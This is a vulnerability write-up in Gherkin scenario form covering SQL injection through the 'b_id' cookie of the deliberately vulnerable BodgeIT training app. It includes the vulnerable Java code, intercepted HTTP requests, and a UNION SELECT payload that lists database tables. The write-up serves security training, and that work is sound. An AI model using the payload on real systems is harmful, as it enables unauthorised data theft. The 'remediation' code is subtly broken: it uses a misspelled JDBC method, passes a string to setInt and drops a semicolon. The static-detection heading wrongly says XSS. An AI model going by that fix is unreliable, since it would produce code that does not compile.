## Version 1.4.1
## language: en

Feature:
  TOE:
    BodgeIT
  Category:
    Injection Flaws
  Location:
    bodgeit/basket.jsp - b_id (cookie)
  CWE:
    CWE-0089: Improper Neutralization of Special Elements used in an SQL Command
    ('SQL Injection') -base-
      https://cwe.mitre.org/data/definitions/89.html
    CWE-0943: Improper Neutralization of Special Elements in Data Query
    Logic -class-
      https://cwe.mitre.org/data/definitions/943.html
    CWE-1019: Validate Inputs
      https://cwe.mitre.org/data/definitions/1019.html
  CAPEC:
    CAPEC-066: SQL Injection -standard-
      http://capec.mitre.org/data/definitions/66.html
    CAPEC-248: Command Injection
      http://capec.mitre.org/data/definitions/248.html
  Rule:
    REQ.172: https://fluidattacks.com/web/es/rules/172/
  Goal:
    Inject a SQL query in an unintended field
  Recommendation:
    Use prepared statements for SQL queries

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running BodgeIT in a docker container at
    """
    http://localhost:8000/bodgeit/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/bodgeit/basket.jsp
    Then I can see my basket

  Scenario: Static detection
  No input validation for unusual XSS payloads
    When I look at the code at "/bodgeit/root/basket.jsp"
    """
    ...
    37  String userid = (String) session.getAttribute("userid");
    38  Cookie[] cookies = request.getCookies();
    39  String basketId = null;
    40  if (cookies != null) {
    41    for (Cookie cookie : cookies) {
    42      if (cookie.getName().equals("b_id") && cookie.getValue().length() >
    0) {
    43        basketId = cookie.getValue();
    44        break;
    45      }
    46    }
    47  }
    48
    49  if (basketId != null) {
    59    // Dont need to do anything else
    51
    52    // Well, apart from checking to see if they've accessed someone elses
    basket ;)
    53    Statement stmt = conn.createStatement();
    54    try {
    55      ResultSet rs = stmt.executeQuery("SELECT * FROM Baskets WHERE basket
    id = " + basketId);
    56      rs.next();
    57      String bUserId = "" + rs.getInt("userid");
    ...
    """
    Then I see it's building the SQL query with a raw cookie value

  Scenario: Dynamic detection
  SQL injection
    Given I am logged in to the site
    And intercept a basket request with Burp and send it to repeater
    """
    POST /bodgeit/basket.jsp HTTP/1.1
    Host: localhost:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/
    65.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*
    ;q=0.8
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8000/bodgeit/basket.jsp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 34
    Connection: close
    Cookie: b_id=""; JSESSIONID=425674594D1E78949DF2836384878A32
    Upgrade-Insecure-Requests: 1

    quantity_30=1&update=Update+Basket
    """
    Then I try inserting a quote in the "b_id" cookie
    """
    POST /bodgeit/basket.jsp HTTP/1.1
    Host: localhost:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/
    65.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*
    ;q=0.8
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8000/bodgeit/basket.jsp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 34
    Connection: close
    Cookie: b_id="1'"; JSESSIONID=425674594D1E78949DF2836384878A32
    Upgrade-Insecure-Requests: 1

    quantity_30=1&update=Update+Basket
    """
    Then I get an error response
    """
    Your Basket
    System error. System error.
    """
    Then I know there's a SQL injection vulnerability

  Scenario: Exploitation
  Exfiltrate data
    Given I send a request with the data
    """
    b_id="2 UNION SELECT 1, 2, 3, 4, 5.2, 6, TABLE_NAME, 8, 9, 10 FROM
    INFORMATION_SCHEMA.SYSTEM_TABLES ; --"
    """
    Then I get a table with all the tables in the database (evidence)[tabs.png]
    Then I can build upon this to get any data I need from the database

  Scenario: Remediation
  Using prepared statements
    Given I patch the code as follows
    """
    ...
    37  String userid = (String) session.getAttribute("userid");
    38  Cookie[] cookies = request.getCookies();
    39  String basketId = null;
    40  if (cookies != null) {
    41    for (Cookie cookie : cookies) {
    42      if (cookie.getName().equals("b_id") && cookie.getValue().length() >
    0) {
    43        basketId = cookie.getValue();
    44        break;
    45      }
    46    }
    47  }
    48
    49  if (basketId != null) {
    59    // Dont need to do anything else
    51
    52    // Well, apart from checking to see if they've accessed someone elses
    basket ;)
    53    PreparedStatement stmt = conn.preparedStatement("SELECT * FROM Baskets
    WHERE basketid = ?");
    54    stmt.setInt(1, basketId)
    55    try {
    56      ResultSet rs = stmt.executeQuery();
    57      rs.next();
    58      String bUserId = "" + rs.getInt("userid");
    ...
    """
    Then SQL injection is not posible anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.1/10 (High) - AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.5/10 (High) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.5/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-02-16
